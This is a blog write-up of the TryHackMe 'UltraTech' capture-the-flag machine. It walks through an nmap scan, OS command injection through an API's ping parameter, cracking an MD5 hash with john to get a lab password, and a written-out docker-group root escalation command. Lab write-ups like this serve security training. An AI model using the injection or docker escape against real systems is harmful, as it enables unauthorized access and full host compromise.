Mastodon
Posts UltraTech Machine - Writeup
Post
Cancel

UltraTech Machine - Writeup

Desktop View


Introduction


Hello InfoSec Folks, Today I did UltraTech machine from TryHackMe. It was medium level machine in which there are two webservers in which one is for API running on NodeJs and another is for frontend. The initial shell can get by doing Os Command Injection on webserver’s API running on port 8081. For User there is MD5 hash saved in sqlite database and root can be owned with exploiting misconfigured docker.

Let’s pawn this box.

This blog is meant for educational purposes only.


Port & Service Enumeration


Starting with Nmap, As you can see below, The nmap scan revealed 4 port in which two are webserver running http on port 8081 and 31331 respectively.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@kali:/tmp/ultratech# nmap -sC -sV -p- -T4 10.10.187.66
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 23:49 IST
Nmap scan report for 10.10.187.66
Host is up (0.17s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)
|   256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)
|_  256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)
8081/tcp  open  http    Node.js Express framework
|_http-cors: HEAD GET POST PUT DELETE PATCH
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1021.01 seconds

We tried to do anonymous login on port 21 but it wasn’t configured for anonymous login and also there were no exploit or CVE available for this particular version of ftp.


Web Enumeration


For further enumeration, I moved to Port 8081 to check which kind of web application is running. It was API server. Next I checked webserver running on port 31331 and There I got web application.

I started directory fuzzing on this web application to find something fruitful and I got one directory as /js/ which has directory listing enabled.

Desktop View

Desktop View

There I found one Javascript file named api.js which contains below code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
function checkAPIStatus() {
        const req = new XMLHttpRequest();
        try {
            const url = `http://${getAPIURL()}/ping?ip=${window.location.hostname}`
            req.open('GET', url, true);
            req.onload = function(e) {
                if (req.readyState === 4) {
                    if (req.status === 200) {
                        console.log('The api seems to be running')
                    } else {
                        console.error(req.statusText);
                    }
                }
            };

So here the web application calling one api with endpoint as /ping?ip= which looks vulnerable for OS Command Injection.

For confirmation I tested the functionality.

Desktop View

As you can see in above GIF, When I inserted (single quote) then it gave syntax error as gives in bash.


Initial Shell


For initial shell we used ` (backtick) to insert our command and with this we got out initial shell.

Desktop View

Here we got initial shell of this machine. Now let’s do some enumeration to get user.


Privilege Escalation: User


After getting initial shell, First I checked /home directory to see what users are there and I found three users there (lp1, r00t, www)

After visiting to /home/www/api/ directory, We found one sqlite file which contains r00t user’s hash. As it was MD5 hash, We cracked it using john.

Desktop View

1
john --format=Raw-MD5 hash.txt

Desktop View

We got password as n100906 after cracking r00t user’s md5 hash. Now let’s login into r00t with SSH using above password.


Privilege Escalation: Root


After doing login with r00t I ran linpeas.sh to check for Privilege Escalation Vulnerabilities.

Desktop View

As you can see in screenshot, The current user is in docker group so I just did some google for Privilege Escalation using Docker and got GTFOBins.

To get root using docker, We first need to check containers of docker.

1
2
docker images
docker run -v /:/mnt --rm -it bash chroot /mnt sh

Desktop View

Thanks for reading this writeup and all suggestions are welcome.

This post is licensed under CC BY 4.0 by the author.